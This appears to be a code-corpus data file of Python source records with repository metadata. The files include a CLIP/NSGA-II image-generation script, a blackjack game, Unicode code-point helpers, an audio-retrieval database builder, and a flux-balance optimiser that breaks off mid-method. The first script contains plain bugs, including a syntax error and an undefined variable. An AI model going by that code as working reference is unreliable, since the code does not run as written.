T.CenterCrop(224),
T.ToTensor(),
T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
input_tensor = preprocess(img)
input_batch = input_tensor.unsqueeze(0)
input_batch = input_batch.to(device)
model.to(device)
with torch.no_grad():
output = model(input_batch)
probabilities = torch.nn.functional.softmax(output[0], dim=0)
image_real_score = 0
image_label_score = 0
text_label_score = 0
# Read the categories
with open('./text_labels/imagenet_classes.txt', 'r') as f:
categories = [s.strip() for s in f.readlines()]
top10_prob, top10_catid = torch.topk(probabilities, 10)
for i in range(len(top10_prob)):
# image_real_score
# to scoring image with realistic
image_real_score += top10_prob[i].item()*100
# image_label_score
# to scoring image with text and image similarity
#image_label_score += get_text_image_score(txt = categories[top10_catid[i]],img = img)
# text_label_score
# to scoring image with all words and label similarity
text_label_score += get_text_label_score(txt = txt,label = categories[top10_catid[i]])
# image_label_score/=10
text_label_score/=10
maper = {'text_image':text_image_score,
'image_real':image_real_score,
'image_label':image_label_score,
'text_label':text_label_score}
return maper
# get socre from noise
def get_score_from_noises(txt = '',noises = None):
with torch.no_grad():
device = 'cuda:0'
noises = noises.to(device)
clip_model,_ = clip.load(gen_model_name, device=device,jit=False)
clip_model = clip_model.eval()
txt_fts = get_txt_fts(txt = txt,model = clip_model)
# score list
text_image_scores = []
image_real_scores = []
image_label_scores = []
text_label_scores = []
for noise in noises:
noise = noise.view(1,-1)
img = get_img(txt = txt,noise = noise,model = clip_model)
score = get_score(txt = txt,img = img)
text_image_scores.append(-score['text_image'])
image_real_scores.append(-score['image_real'])
#image_label_scores.append(-score['image_label'])
text_label_scores.append(-score['text_label'])
return text_image_scores,image_real_scores,image_label_scores,text_label_scores
# generate image using noise
def gen_from_noises(txt = '',noises = None,name = None):
with torch.no_grad():
device = 'cuda:0'
clip_model, _ = clip.load(gen_model_name, device=device,jit=False)
clip_model = clip_model.eval()
txt_fts = get_txt_fts(txt = txt,model = clip_model)
score = {}
for noise in noises:
noise = torch.from_numpy(noise).to(device)
noise = noise.view(1,-1)
img = get_img(txt = txt,noise = noise,model = clip_model)
score = get_score(txt = txt,img = img)
if name is None:
img.save('./image_result/{}/{:.2f}.png'.format(txt,(sum(score.values()))))
else:
img.save('./image_result/{}/{}-{:.2f}.png'.format(txt,name,(sum(score.values()))))
# for tournament selection
def binary_tournament(pop, P, algorithm, **kwargs):
n_tournaments, n_competitors = P.shape
if n_competitors != 2:
raise Exception('Only pressure=2 allowed for binary tournament!')
S = np.full(n_tournaments, -1, dtype=np.int)
for i in range(n_tournaments):
a, b = P[i]
if np.sum(pop[a].F) < np.sum(pop[b].F):
S[i] = a
else:
S[i] = b
return S
def text_texts_sim(txt = '',memory = None,pick_num = 10):
scores = []
device = 'cuda:0'
clip_model, _ = clip.load(dis_model_name, device=device,jit=False)
clip_model = clip_model.eval()
txt_fts = get_txt_fts(txt = txt,model = clip_model)
txt_fts = txt_fts.detach().cpu().numpy().flatten()
for mem in memory:
ts_fts = get_txt_fts(txt = mem['txt'],model = clip_model)
ts_fts = ts_fts.detach().cpu().numpy().flatten()
sim = cosine_similarity(txt_fts,ts_fts)
scores.append(sim)
scores = torch.Tensor(scores)
probabilities = torch.nn.functional.softmax(scores, dim=0)
top_prob,top_id = torch.topk(probabilities, min(pick_num,len(probabilities)))
top_txt = []
for ids in top_id:
top_txt.append(memory[ids]['txt'])
return top_prob,top_txt
def noise_memory(txt = '',pop = None,pick = False):
memory_file = 'noise_memory.json'
noises = []
cnt = 0
if not os.path.exists(memory_file):
return np.random.normal(loc=0.0, scale=1.0, size=(pop,512))
with open(memory_file,'r+') as f:
memory = json.load(f)
if len(memory)<=0:
return np.random.normal(loc=0.0, scale=1.0, size=(pop,512))
prob,txts = text_texts_sim(txt,memory,pick_num = pop//2)
prob = torch.nn.functional.softmax(prob, dim=0)
coff = dict(zip(txts, prob))
if pick == True:
noise = 0
for mem in memory:
if mem['txt'] in txts:
noise += coff[mem['txt']] * torch.Tensor(mem['noise'])
return noise.numpy()
elif pick == False:
for mem in memory:
if cnt>=pop:
break
if mem['txt'] in txts:
if coff[mem['txt']]>=1/(len(prob)):
noises.append(mem['noise'])
cnt+=1
noises = np.array(noises)
length = len(noises)
print('memory reuse : \nnoise memory : {} , normal distribution : {}'.format(len(noises),pop-len(noises)))
if length == 0:
return np.random.normal(loc=0.0, scale=1.0, size=(pop,512))
if pop>length:
noises = np.concatenate((noises, np.random.normal(loc=0.0, scale=1.0, size=(pop-length,512))), axis=0)
return noises
f.close()
def make_memory(txt = '',noise = None):
memory_file = 'noise_memory.json'
listobj = []
with open(memory_file,'r+') as f:
listobj = json.load(f)
f.close()
with open(memory_file,'w') as f:
noise_ori = 0
found = False
for obj in listobj:
if obj['txt'] == txt:
noise_ori = np.array(obj['noise'])
tis1,irs1,_,tls1 = get_score_from_noises(txt = txt,noises = torch.from_numpy(noise.reshape((1,512))))
tis2,irs2,_,tls2 = get_score_from_noises(txt = txt,noises = torch.from_numpy(noise_ori.reshape((1,512))))
if tis1[0]+irs1[0]+tls1[0]>tis2[0]+irs2[0]+tls2[0] :
obj['noise'] = noise
found = True
break
if found == False:
listobj.append({'txt':txt,'noise':list(noise)})
json.dump(listobj, f, indent=4, separators=(',',': '))
f.close()
def noise_perturbation(noise = None,level = 0.01):
pass
def get_fes(txt = '',pop = 100,ofs = 100,gen = 50):
algorithm = NSGA2(
pop_size = pop,
n_offsprings = ofs,
# sampling method : normal distribution
# sampling=np.random.normal(loc=0.0, scale=1.0, size=(pop,512)),
sampling = noise_memory(txt = txt,pop = pop),
selection = get_selection('tournament',pressure = 2, func_comp = binary_tournament),
crossover = get_crossover('real_sbx'),
mutation = get_mutation('real_pm',eta=15, prob=1.0),
#eliminate_duplicates=True
)
problem = MyProblem(txt)
# termination setting
termination = MultiObjectiveDefaultTermination(
x_tol=1e-8,
cv_tol=1e-6,
f_tol=0.0025,
nth_gen=5,
n_last=30,
n_max_gen=gen,
n_max_evals=pop + gan * ofs
)
# minimize the problem
# maximize : using negative
res = minimize(
problem,
algorithm,
# termination check
termination,
#('n_gen',gen),
seed=1,
# display form
display=MyDisplay(),
# display bar
verbose=True
)
# normalization
if len(res.F)>=2:
mean = np.mean(res.F,axis = 0)
std = np.std(res.F,axis = 0)
# print(mean)
# print(std)
for i in range(len(res.F)):
res.F[i] = (res.F[i]-mean)/std
# draw dist
plot = Scatter()
plot.add(problem.pareto_front(), plot_type="line", color="black", alpha=0.7)
plot.add(res.F, color="red")
plot.save('front.png')
return res
def mcdm(res = None):
F = res.F
approx_ideal = F.min(axis=0)
approx_nadir = F.max(axis=0)
nF = (F - approx_ideal) / (approx_nadir - approx_ideal)
# weight is the importance of scores
weights = np.array([0.30,0.40,0.30])
decomp = get_decomposition("asf")
I = decomp.do(nF, 1/weights).argmin()
# print(F)
# print(weights)
print("Best regarding decomposition: Point {} - {}".format(I, -F[I]))
# plot = get_visualization("scatter")
# plot.add(F, color="blue", alpha=0.2, s=10)
# plot.add(F[I], color="red", s=30)
# plot.do()
# plot.apply(lambda ax: ax.arrow(0, 0, 0.5, 0.5, color='black',
# head_width=0.01, head_length=0.01, alpha=0.4))
# plot.show()
return I
def ploter(score = None):
name = {0:'text_image',1:'image_real',2:'text_label'}
score = score.transpose()
# transfrom score to postive
score = score*(-1)
n_objective = len(score)
if not os.path.exists('pareto_front/'):
os.mkdir('pareto_front/')
for i in range(n_objective):
for j in range(n_objective):
if i==j:
continue
plt.clf()
plt.title('{} v.s {}'.format(name[i],name[j]))
plt.plot(score[i],score[j], 'bo')
plt.xlabel('{} score'.format(name[i]))
plt.ylabel('{} score'.format(name[j]))
plt.grid(True)
plt.savefig('pareto_front/{}-{}.png'.format(name[i],name[j]))
def region_word_loss(txt = None,img = None):
device = 'cuda:0'
clip_model, preprocess = clip.load(dis_model_name, device=device,jit=False)
clip_model = clip_model.eval()
txt_list = re.split('; |, | |\n',txt)
M = img.shape[0]//len(txt_list)
N = img.shape[1]//len(txt_list)
region_list = [img[x:x+M,y:y+N] for x in range(0,img.shape[0],M) for y in range(0,img.shape[1],N)]
word_fts_list = []
region_fts_list = []
for ts in range(txt_list):
word_fts_list.append(get_txt_fts(txt = ts,model = clip_model))
for rs in range(region_list)
region_fts_list.append(get_img_fts(img = rs,model = clip_model,preprocess = preprocess))
word_fts_list = np.array(word_fts_list)
region_fts_list = np.array(region_fts_list)
word_fts_list.reshape((1,-1))
region_fts_list.reshape((1,-1))
max_len = len(txt_list)
loss,_,_ = attention_lib.word_loss(region_fts_list,word_fts_list,max_len)
print(loss)
return loss
if __name__ == '__main__':
# parser for convenient using
parser = argparse.ArgumentParser()
# whether to run get fesiable solution or not
parser.add_argument('-r', '--run', action='store_true',default = False)
# setting text
parser.add_argument('-t', '--text',type = str,default = 'a dog lying on an orange couch in the living room.')
# setting image generation (for normal generating)
parser.add_argument('-n', '--num',type = int,default = 10)
# pick #image
parser.add_argument('-p', '--pick',type = int,default = 1)
# get fesiable solution setting
parser.add_argument('-s', '--set',type = str,default = '1 1 1')
# draw plot
parser.add_argument('-d', '--draw',action='store_true',default = False)
# save memory
parser.add_argument('-m', '--save_mem',action='store_true',default = False)
args = parser.parse_args()
# split setting sentence
set_list = args.set
set_list = set_list.split()
pop = int(set_list[0])
ofs = int(set_list[1])
gen = int(set_list[2])
t = Timer()
txt = args.text
if not os.path.exists('image_result/{}'.format(txt)):
os.mkdir('image_result/{}'.format(txt))
path = 'image_result/{}/noise.txt'.format(txt)
f = open(path, 'w')
print('generate text = {}'.format(txt))
# run get fesiable solution
if args.run==True :
print('find fes : pop = {} , ofs = {} , gen = {}'.format(pop,ofs,gen))
res = get_fes(txt = txt,pop = pop, ofs = ofs,gen = gen)
# np.set_printoptions(threshold=sys.maxsize)
# print(res.X,file = f)
# draw pareto front
if args.draw == True:
ploter(res.F)
# generating image from res.X (nds)
# gen_from_noises(txt = txt,noises = res.X)
# Multi-Criteria Decision Making
best_res_id = mcdm(res)
gen_from_noises(txt = txt,noises = np.array([res.X[best_res_id]]),name = 'best_pick')
# store memory
if args.save_mem == True:
make_memory(txt = txt,noise = res.X[best_res_id])
# gen_from_noises(txt = txt,noises = np.array([noise_memory(txt = txt,pop = 1,pick = True)]),name = '123')
else :
print('generate {} images'.format(args.num))
gen_scored(txt = txt,image_n = args.num)
t.print_time()
f.close() | 16,844 | -6 | 869 |
efc216ee5e2342ef95305d4f352d31660f7facd5 | 726 | py | Python | ABC145/ABC145c.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | ABC145/ABC145c.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | ABC145/ABC145c.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | # ABC145c
if __name__ == '__main__':
main()
| 21.352941 | 77 | 0.53168 | # ABC145c
def main():
import sys
import itertools
import math
input = sys.stdin.readline
sys.setrecursionlimit(10**6)
# map(int,input().split())
n = int(input())
town = [tuple(map(int, input().split())) for _ in range(n)]
ans = 0
def kyori(pos1, pos2):
return math.sqrt((pos1[0] - pos2[0]) ** 2 + (pos1[1] - pos2[1]) ** 2)
def permutations_count(n, r):
return math.factorial(n) // math.factorial(n - r)
for i in itertools.permutations(town, n):
# print(i)
t = 0
for j in range(1, n):
t += kyori(i[j - 1], i[j])
# print(t)
ans += t
print(ans/math.factorial(n))
if __name__ == '__main__':
main()
| 652 | 0 | 23 |
4fa93a39bffc9c6d90b2d240bb9e747e50e4cc00 | 4,269 | py | Python | blackjack.py | Alfredooe/twoplayerblackjack | 738858edd68b7de1834e53f86487e560bb9ed038 | [
"Unlicense"
] | null | null | null | blackjack.py | Alfredooe/twoplayerblackjack | 738858edd68b7de1834e53f86487e560bb9ed038 | [
"Unlicense"
] | null | null | null | blackjack.py | Alfredooe/twoplayerblackjack | 738858edd68b7de1834e53f86487e560bb9ed038 | [
"Unlicense"
] | null | null | null | #'random' library import
import random
#rank list & suit dictionary
cardranks = ["Clubs", "Diamonds", "Hearts", "Spades"]
cardsuits = {"Ace":11, "One":1, "Two":2, "Three":3, "Four":4, "Five":5, "Six":6, "Seven":7, "Eight":8, "Nine":9, "Ten":10, "Jack":10, "Queen":10, "King":10}
#player class w/ public attributes
#deck class generates every possible card within the deck, appending each possiblity to a list
#dealing method assigns a random card at the beginning to each player
#card class
#return string representation, nice way of doing this.
#Input verification and looping to ensure correct input
#lol
#player name input request
player1 = Player(input("Player 1, enter your name. : "))
player2 = Player(input("Player 2, enter your name. : "))
#deck object is formed
deck = Deck()
print(f"I will now deal your initial cards, {player1.name} and {player2.name}.\n")
#first 2 random cards are generated for both players
deck.deal(player1)
deck.deal(player2)
print(f"Good luck, players.\n")
while True:
turn(player1)
turn(player2)
#!!!!!!!!!Adjust the code so that player has a hand object instead of player having a list for cards.!!!!!!!!!
#Settings n getters
| 33.351563 | 156 | 0.585383 | #'random' library import
import random
#rank list & suit dictionary
cardranks = ["Clubs", "Diamonds", "Hearts", "Spades"]
cardsuits = {"Ace":11, "One":1, "Two":2, "Three":3, "Four":4, "Five":5, "Six":6, "Seven":7, "Eight":8, "Nine":9, "Ten":10, "Jack":10, "Queen":10, "King":10}
#player class w/ public attributes
class Player:
def __init__(self, name):
self.name = name
self.hand = []
self.stuck = False
self.score = 0
#deck class generates every possible card within the deck, appending each possiblity to a list
class Deck:
def __init__(self):
self.cards = []
#Iterating through lists and appending created objects to deck
for a in cardsuits:
for b in cardranks:
self.cards.append(Card(a, b))
#dealing method assigns a random card at the beginning to each player
def deal(self, player):
card = random.choice(self.cards)
#randomly assigned card output
print(f"{player.name}, you've been dealt card {card} with a value of {card.value}")
player.hand.append(card)
#Ace handling
#if card.value == 11:
# aceswap = inputhandler("norm", player)
# if aceswap == "T":
# player.score = player.score + 11
# elif aceswap == "S":
# player.score = player.score + 1
if card.value == 11:
if player.score <= 10:
player.score = player.score + 11
elif player.score > 10:
player.score = player.score + 1
else:
player.score = player.score + card.value
self.cards.remove(card)
return card
#card class
class Card:
def __init__(self, r, s):
self.rank = r
self.suit = s
self.value = cardsuits[self.rank]
#return string representation, nice way of doing this.
def __str__(self):
return f"{self.rank} of {self.suit}"
#Input verification and looping to ensure correct input
def inputhandler(task, player):
if task == "norm":
print(f"{player.name}, T for twist or S for stick. : ")
elif task == "ace":
print(f"{player.name}, you've been dealt an ace! T for a value of 11 or S for 1 : ")
while True:
data = input().upper()
if data not in ("T", "S"):
print("Invalid input. Please re-enter.")
continue
else:
return data
def turn(player):
#Checking both stuck
if player1.stuck == True & player2.stuck == True:
#player 1 winning scenario
if player1.score > player2.score:
print(f"Congratulations {player1.name}, you won!")
gameover()
#player 2 winning scenario
elif player1.score < player2.score:
print(f"Congratulations {player2.name}, you won!")
gameover()
#draw scenario
elif player1.score == player2.score:
print(f"Congratulations i guess, you managed to come a draw.")
gameover()
elif player.stuck == True:
return
elif player.stuck == False:
move = inputhandler("norm", player)
#player choosing to stick
if move == "S":
player.stuck = True
#player choosing to twist
elif move == "T":
card = deck.deal(player)
#score above 21
if player.score > 21:
print(f"{player.name}. You went over 21, with a score of {player.score}, You lost!")
gameover()
else:
#output for updated score
print(f"{player.name}, you've now got a score of {player.score}.\n")
#lol
def gameover():
quit()
#player name input request
player1 = Player(input("Player 1, enter your name. : "))
player2 = Player(input("Player 2, enter your name. : "))
#deck object is formed
deck = Deck()
print(f"I will now deal your initial cards, {player1.name} and {player2.name}.\n")
#first 2 random cards are generated for both players
deck.deal(player1)
deck.deal(player2)
print(f"Good luck, players.\n")
while True:
turn(player1)
turn(player2)
#!!!!!!!!!Adjust the code so that player has a hand object instead of player having a list for cards.!!!!!!!!!
#Settings n getters
| 2,819 | -28 | 275 |
4c41018a3dbac3faca5ec4517af07bfca312b2a0 | 3,685 | py | Python | elementpath/regex/codepoints.py | sissaschool/elementpath | a74ce89c04622d8ae98ab739886c3e46f87b024e | [
"MIT"
] | 21 | 2019-10-02T18:36:16.000Z | 2022-03-14T15:46:00.000Z | elementpath/regex/codepoints.py | sissaschool/elementpath | a74ce89c04622d8ae98ab739886c3e46f87b024e | [
"MIT"
] | 32 | 2019-08-28T13:04:16.000Z | 2021-12-16T17:05:49.000Z | elementpath/regex/codepoints.py | sissaschool/elementpath | a74ce89c04622d8ae98ab739886c3e46f87b024e | [
"MIT"
] | 9 | 2019-08-28T11:24:49.000Z | 2022-01-12T23:53:28.000Z | #
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module defines Unicode code points helper functions.
"""
from sys import maxunicode
from typing import Iterable, Iterator, Optional, Set, Tuple, Union
CHARACTER_CLASS_ESCAPED: Set[int] = {ord(c) for c in r'-|.^?*+{}()[]\\'}
"""Code Points of escaped chars in a character class."""
CodePoint = Union[int, Tuple[int, int]]
def code_point_order(cp: CodePoint) -> int:
"""Ordering function for code points."""
return cp if isinstance(cp, int) else cp[0]
def code_point_reverse_order(cp: CodePoint) -> int:
"""Reverse ordering function for code points."""
return cp if isinstance(cp, int) else cp[1] - 1
def iter_code_points(code_points: Iterable[CodePoint], reverse=False) -> Iterator[CodePoint]:
"""
Iterates a code points sequence. Three ore more consecutive
code points are merged in a range.
:param code_points: an iterable with code points and code point ranges.
:param reverse: if `True` reverses the order of the sequence.
:return: yields code points or code point ranges.
"""
start_cp = end_cp = 0
if reverse:
code_points = sorted(code_points, key=code_point_reverse_order, reverse=True)
else:
code_points = sorted(code_points, key=code_point_order)
for cp in code_points:
if isinstance(cp, int):
cp = cp, cp + 1
if not end_cp:
start_cp, end_cp = cp
continue
elif reverse:
if start_cp <= cp[1]:
start_cp = min(start_cp, cp[0])
continue
elif end_cp >= cp[0]:
end_cp = max(end_cp, cp[1])
continue
if end_cp > start_cp + 1:
yield start_cp, end_cp
else:
yield start_cp
start_cp, end_cp = cp
else:
if end_cp:
if end_cp > start_cp + 1:
yield start_cp, end_cp
else:
yield start_cp
def get_code_point_range(cp: CodePoint) -> Optional[CodePoint]:
"""
Returns a code point range.
:param cp: a single code point or a code point range.
:return: a code point range or `None` if the argument is not a \
code point or a code point range.
"""
if isinstance(cp, int):
if 0 <= cp <= maxunicode:
return cp, cp + 1
else:
try:
if isinstance(cp[0], int) and isinstance(cp[1], int):
if 0 <= cp[0] < cp[1] <= maxunicode + 1:
return cp
except (IndexError, TypeError):
pass
return None
def code_point_repr(cp: CodePoint) -> str:
"""
Returns the string representation of a code point.
:param cp: an integer or a tuple with at least two integers. \
Values must be in interval [0, sys.maxunicode].
"""
if isinstance(cp, int):
if cp in CHARACTER_CLASS_ESCAPED:
return r'\%s' % chr(cp)
return chr(cp)
if cp[0] in CHARACTER_CLASS_ESCAPED:
start_char = r'\%s' % chr(cp[0])
else:
start_char = chr(cp[0])
end_cp = cp[1] - 1 # Character ranges include the right bound
if end_cp in CHARACTER_CLASS_ESCAPED:
end_char = r'\%s' % chr(end_cp)
else:
end_char = chr(end_cp)
if end_cp > cp[0] + 1:
return '%s-%s' % (start_char, end_char)
else:
return start_char + end_char
| 29.717742 | 93 | 0.609227 | #
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module defines Unicode code points helper functions.
"""
from sys import maxunicode
from typing import Iterable, Iterator, Optional, Set, Tuple, Union
CHARACTER_CLASS_ESCAPED: Set[int] = {ord(c) for c in r'-|.^?*+{}()[]\\'}
"""Code Points of escaped chars in a character class."""
CodePoint = Union[int, Tuple[int, int]]
def code_point_order(cp: CodePoint) -> int:
"""Ordering function for code points."""
return cp if isinstance(cp, int) else cp[0]
def code_point_reverse_order(cp: CodePoint) -> int:
"""Reverse ordering function for code points."""
return cp if isinstance(cp, int) else cp[1] - 1
def iter_code_points(code_points: Iterable[CodePoint], reverse=False) -> Iterator[CodePoint]:
"""
Iterates a code points sequence. Three ore more consecutive
code points are merged in a range.
:param code_points: an iterable with code points and code point ranges.
:param reverse: if `True` reverses the order of the sequence.
:return: yields code points or code point ranges.
"""
start_cp = end_cp = 0
if reverse:
code_points = sorted(code_points, key=code_point_reverse_order, reverse=True)
else:
code_points = sorted(code_points, key=code_point_order)
for cp in code_points:
if isinstance(cp, int):
cp = cp, cp + 1
if not end_cp:
start_cp, end_cp = cp
continue
elif reverse:
if start_cp <= cp[1]:
start_cp = min(start_cp, cp[0])
continue
elif end_cp >= cp[0]:
end_cp = max(end_cp, cp[1])
continue
if end_cp > start_cp + 1:
yield start_cp, end_cp
else:
yield start_cp
start_cp, end_cp = cp
else:
if end_cp:
if end_cp > start_cp + 1:
yield start_cp, end_cp
else:
yield start_cp
def get_code_point_range(cp: CodePoint) -> Optional[CodePoint]:
"""
Returns a code point range.
:param cp: a single code point or a code point range.
:return: a code point range or `None` if the argument is not a \
code point or a code point range.
"""
if isinstance(cp, int):
if 0 <= cp <= maxunicode:
return cp, cp + 1
else:
try:
if isinstance(cp[0], int) and isinstance(cp[1], int):
if 0 <= cp[0] < cp[1] <= maxunicode + 1:
return cp
except (IndexError, TypeError):
pass
return None
def code_point_repr(cp: CodePoint) -> str:
"""
Returns the string representation of a code point.
:param cp: an integer or a tuple with at least two integers. \
Values must be in interval [0, sys.maxunicode].
"""
if isinstance(cp, int):
if cp in CHARACTER_CLASS_ESCAPED:
return r'\%s' % chr(cp)
return chr(cp)
if cp[0] in CHARACTER_CLASS_ESCAPED:
start_char = r'\%s' % chr(cp[0])
else:
start_char = chr(cp[0])
end_cp = cp[1] - 1 # Character ranges include the right bound
if end_cp in CHARACTER_CLASS_ESCAPED:
end_char = r'\%s' % chr(end_cp)
else:
end_char = chr(end_cp)
if end_cp > cp[0] + 1:
return '%s-%s' % (start_char, end_char)
else:
return start_char + end_char
| 0 | 0 | 0 |
136655a1d66ff352e8605dae58e21ef5325cc3a5 | 2,834 | py | Python | deep_audio_features/bin/deep_retrieval_build_db.py | nikosmichas/deep_audio_features | ad45cd5681e1550481fdd10064ad2371b39ac05f | [
"MIT"
] | 40 | 2020-07-24T17:09:44.000Z | 2022-02-26T10:22:12.000Z | deep_audio_features/bin/deep_retrieval_build_db.py | nikosmichas/deep_audio_features | ad45cd5681e1550481fdd10064ad2371b39ac05f | [
"MIT"
] | 40 | 2020-07-20T17:21:20.000Z | 2022-01-28T23:02:07.000Z | deep_audio_features/bin/deep_retrieval_build_db.py | nikosmichas/deep_audio_features | ad45cd5681e1550481fdd10064ad2371b39ac05f | [
"MIT"
] | 5 | 2020-08-20T09:19:00.000Z | 2022-01-05T18:29:37.000Z | import argparse
import torch
from torch.utils.data import DataLoader
import sys, os
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../"))
from deep_audio_features.dataloading.dataloading import FeatureExtractorDataset
from deep_audio_features.lib.training import test
from deep_audio_features.utils.model_editing import drop_layers
from deep_audio_features.bin.basic_test import test_model
import deep_audio_features.bin.config
import os
import glob
import numpy as np
import pickle
if __name__ == '__main__':
# Read arguments
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model_dir', required=True,
type=str, help='Dir of models')
parser.add_argument('-i', '--input', required=True,
type=str, help='Input file for testing')
args = parser.parse_args()
model_dir = args.model_dir
ifile = args.input
compile_deep_database(ifile, model_dir, "db")
| 32.574713 | 84 | 0.659492 | import argparse
import torch
from torch.utils.data import DataLoader
import sys, os
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../"))
from deep_audio_features.dataloading.dataloading import FeatureExtractorDataset
from deep_audio_features.lib.training import test
from deep_audio_features.utils.model_editing import drop_layers
from deep_audio_features.bin.basic_test import test_model
import deep_audio_features.bin.config
import os
import glob
import numpy as np
import pickle
def load_models(models_path):
models = []
for file in os.listdir(models_path):
if file.endswith(".pt"):
models.append(os.path.join(models_path, file))
return models
def get_meta_features(audio_file, list_of_models):
# TODO add other layers
layers_dropped = 0
feature_names = []
features_temporal = []
features = np.array([])
for m in list_of_models:
r, soft = test_model(modelpath=m,
ifile=audio_file,
layers_dropped=layers_dropped,
test_segmentation=True,
verbose=True)
# long-term average the posteriors
# (along different CNN segment-decisions)
soft_average = np.mean(soft, axis=0)
features = np.concatenate([features, soft_average])
feature_names += [f'{os.path.basename(m).replace(".pt", "")}_{i}'
for i in range(len(soft_average))]
# keep whole temporal posterior sequences as well
features_temporal.append(soft)
return features, features_temporal, feature_names
def compile_deep_database(data_folder, models_folder, db_path):
audio_files = glob.glob(os.path.join(data_folder, '*.wav'))
models = load_models(models_folder)
all_features = []
all_features_temporal = []
for a in audio_files:
f, f_temporal, f_names = get_meta_features(a, models)
all_features.append(f)
all_features_temporal.append(np.concatenate(f_temporal, axis=1).transpose())
all_features = np.array(all_features)
with open(db_path, 'wb') as f:
pickle.dump(all_features, f)
pickle.dump(all_features_temporal, f)
pickle.dump(f_names, f)
pickle.dump(audio_files, f)
pickle.dump(models_folder, f)
return
if __name__ == '__main__':
# Read arguments
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model_dir', required=True,
type=str, help='Dir of models')
parser.add_argument('-i', '--input', required=True,
type=str, help='Input file for testing')
args = parser.parse_args()
model_dir = args.model_dir
ifile = args.input
compile_deep_database(ifile, model_dir, "db")
| 1,778 | 0 | 69 |
cf3c76ac1491fa84c6c4aef6043115fded9327c2 | 15,383 | py | Python | v0.1/optim/optim.py | Chaowu88/etfba | bfba63685ca217937e32038cc55f530a4d980ad8 | [
"BSD-3-Clause"
] | null | null | null | v0.1/optim/optim.py | Chaowu88/etfba | bfba63685ca217937e32038cc55f530a4d980ad8 | [
"BSD-3-Clause"
] | null | null | null | v0.1/optim/optim.py | Chaowu88/etfba | bfba63685ca217937e32038cc55f530a4d980ad8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__ = 'Chao Wu'
R = 8.315e-3 # gas constant in kJ/mol/K
T = 298.15 # absolute temperature in K, or 25 C
K = 10000 # big enough constant
defaultMW = 40 # default enzyme molecular weight in kDa
defaultKcat = 200 # default reaction catalytic rate constant in 1/s
defaultKm = 0.2 # default reactant Michaelis constant in mM
maxIter = 100000
import re
import numpy as np
from pyomo.environ import (ConcreteModel, Set, Param, Var, Objective, Constraint, SolverFactory,
NonNegativeReals, Binary, value, maximize, minimize, log, exp)
from .result import FBAResults, TFBAResults, ETFBAResults
| 30.222004 | 159 | 0.726581 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__ = 'Chao Wu'
R = 8.315e-3 # gas constant in kJ/mol/K
T = 298.15 # absolute temperature in K, or 25 C
K = 10000 # big enough constant
defaultMW = 40 # default enzyme molecular weight in kDa
defaultKcat = 200 # default reaction catalytic rate constant in 1/s
defaultKm = 0.2 # default reactant Michaelis constant in mM
maxIter = 100000
import re
import numpy as np
from pyomo.environ import (ConcreteModel, Set, Param, Var, Objective, Constraint, SolverFactory,
NonNegativeReals, Binary, value, maximize, minimize, log, exp)
from .result import FBAResults, TFBAResults, ETFBAResults
class FBAOptimizer():
def __init__(self, model, objective, direction, flux_bounds, preset_fluxes, irr_reactions, excluded_mb):
'''
Parameters
model: Model
model that calls FBAOptimizer
objective: dict
reaction ID => coefficient in the objective expression
direction: str
direction of optimization
flux_bounds: tuple
lower and upper bounds of metabolic flux
preset_fluxes: dict
rxnid => float, fixed metabolic fluxes
irr_reactions: list
irreversible reactions
excluded_mb: list
metabolites excluded from mass balance constraints
'''
self.model = model
self.objective = objective
self.direction = direction
self.flux_bounds = flux_bounds
self.irr_reactions = irr_reactions
if self.irr_reactions is not None:
for rxnid, rxn in self.model.reactions.items():
if rxnid in self.irr_reactions:
rxn.rev = False
else:
rxn.rev = True
else:
self.irr_reactions = [rxnid for rxnid, rxn in self.model.reactions.items() if rxn.rev == False]
self.preset_fluxes = preset_fluxes
self.excluded_mb = [] if excluded_mb is None else excluded_mb
self.pyoModel = ConcreteModel()
self.pyoModel.fluxIDs = Set(initialize = self.model.stoichiometric_matrix.columns)
self.pyoModel.metabIDs = Set(initialize = self.model.stoichiometric_matrix.index)
def _build_flux_variables(self):
if self.preset_fluxes is None:
def flux_bounds_rule(model, rxnid):
if rxnid in self.irr_reactions:
return (max(0, self.flux_bounds[0]), self.flux_bounds[1])
else:
return self.flux_bounds
self.pyoModel.fluxes = Var(self.pyoModel.fluxIDs, bounds = flux_bounds_rule)
else:
def flux_bounds_rule(model, rxnid):
if rxnid in self.preset_fluxes: # set the bounds of fixed fluxes
return (self.preset_fluxes[rxnid],)*2
elif rxnid in self.irr_reactions:
return (max(0, self.flux_bounds[0]), self.flux_bounds[1])
else:
return self.flux_bounds
self.pyoModel.fluxes = Var(self.pyoModel.fluxIDs, bounds = flux_bounds_rule)
def _build_objective(self):
for k in self.objective:
if k not in self.model.reactions:
raise KeyError('use valid reaction IDs in objective')
if self.direction.lower() == 'max':
direction = maximize
elif self.direction.lower() == 'min':
direction = minimize
else:
raise ValueError("only 'max' or 'min' is acceptable")
def obj_rule(model):
return sum(coe*model.fluxes[rxnid] for rxnid, coe in self.objective.items())
self.pyoModel.obj = Objective(rule = obj_rule, sense = direction)
def _build_mass_balance_contraints(self):
def mb_rule(model, metabid):
stoyMat = self.model.stoichiometric_matrix
